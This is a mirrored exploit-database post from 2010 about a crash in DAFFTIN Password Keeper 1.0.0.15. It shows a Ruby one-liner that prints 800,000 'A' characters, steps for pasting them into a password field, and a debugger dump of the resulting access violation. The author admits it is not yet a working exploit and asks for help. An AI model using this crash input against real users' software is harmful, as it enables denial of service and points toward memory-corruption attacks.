首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DAFFTIN Password Keeper 1.0.0.15
来源:vfocus.net 作者:Richard 发布时间:2010-04-02  
# Exploit Title: DAFFTIN Password Keeper 1.0.0.15
# Date: 01/04/2010
# Author: Richard leahy
# Software Link: http://www.soft32.com/download_222389.html
# Version: 1.0.0.15
# Platform Tested on: Windows Xp Sp3 & Sp2

#code
!#/usr/bin/env ruby
test = "A" * 800000
puts test

Hey guys, managed to get an access violation when executing 41414141 but only after like 700000 "A's". its seems to cause an access violation after 60000 but only hits our code after roughly 700000 i have not managed to exploit this as it keeps the offset changes can anyone look into this and see if there is a way. here is a dump of the debugging.  to test this open up the application , file -> new, save as test . choose a password eg test.  then once your in the application to go accounts -> new, set title to test then print out the 700000 "A's" into the userid
or password box works for both, then click ok.


(bcc.bd0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0013ae41 ebx=00ebbff0 ecx=00e00ab8 edx=00ec4000 esi=00ebc030 edi=00ec8004
eip=7c80bea9 esp=0013aeb4 ebp=0013aed8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
kernel32!lstrcpyA+0x18:
7c80bea9 8802            mov     byte ptr [edx],al          ds:0023:00ec4000=??
0:000> g
(bcc.bd0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00ec4000 ebx=00ebbff0 ecx=35950941 edx=00ebc031 esi=00ebc030 edi=00ec8004
eip=7c80be64 esp=0013aeb8 ebp=0013aedc iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
kernel32!lstrlen+0x1e:
7c80be64 8a08            mov     cl,byte ptr [eax]          ds:0023:00ec4000=??
0:000> g
(bcc.bd0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00ec2a38 ecx=41414141 edx=41414141 esi=00010008 edi=00529638
eip=0047422a esp=0013ae30 ebp=0052963c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for C:\Program Files\DAFFTIN Password Keeper\PassKeeper.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\DAFFTIN Password Keeper\PassKeeper.exe
PassKeeper+0x7422a:
0047422a 8902            mov     dword ptr [edx],eax  ds:0023:41414141=????????
0:000> dd eip
0047422a  50890289 90c35b04 158b9090 00529648
0047423a  4a8b10eb 72c13b08 0c4a0307 1672c13b
0047424a  fa81128b 00529648 05c7e875 005295e8
0047425a  00000003 c28bd233 8b5390c3 04e983ca
0047426a  83011c8d 0f7c10fa 000703c7 d18b8000
0047427a  0001b9e8 83c35b00 0c7c04fa c981ca8b
0047428a  80000002 0b890889 05ffc35b 005295d8
0047429a  ea83d08b 81128b04 fffffce2 04ea837f
0:000> dd eax
41414141  ???????? ???????? ???????? ????????
41414151  ???????? ???????? ???????? ????????
41414161  ???????? ???????? ???????? ????????
41414171  ???????? ???????? ???????? ????????
41414181  ???????? ???????? ???????? ????????
41414191  ???????? ???????? ???????? ????????
414141a1  ???????? ???????? ???????? ????????
414141b1  ???????? ???????? ???????? ????????
0:000> dd esp
0013ae30  00ec2a38 004746ce 0013ae6c 0013aecc
0013ae40  00ebc030 00010008 00474870 0013aea8
0013ae50  00474894 0013ae6c 0013aecc 00ebc030
0013ae60  00010001 00000000 00000000 0013ae84
0013ae70  004f098f 00010001 00474718 004748a8
0013ae80  00474c1c 0013ae90 004f088d 00010001
0013ae90  0013aed0 004f0112 00010001 00ec8004
0013aea0  00ebc030 00ebbff0 0013af2c 004f1257 



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·uTorrent WebUI versions 0.370
·Kwik Pay Payroll v4.10.3 .mdb
·Escape From PDF
·Kwik Pay Payroll v4.10.3 .zip
·OpenDcHub 0.8.1 Remote Code Ex
·TugZip 3.5 0-day
·BitComet <= 1.19 Remote DoS Ex
·mplayer <= 4.4.1 NULL pointer
·Optimal Archive v1.38 (.zip) 0
·uTorrent WebUI <= v0.370 Autho
·WM Downloader 3.0.0.9 (.asx) L
·Google Chrome 4.1 OOB Array In
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved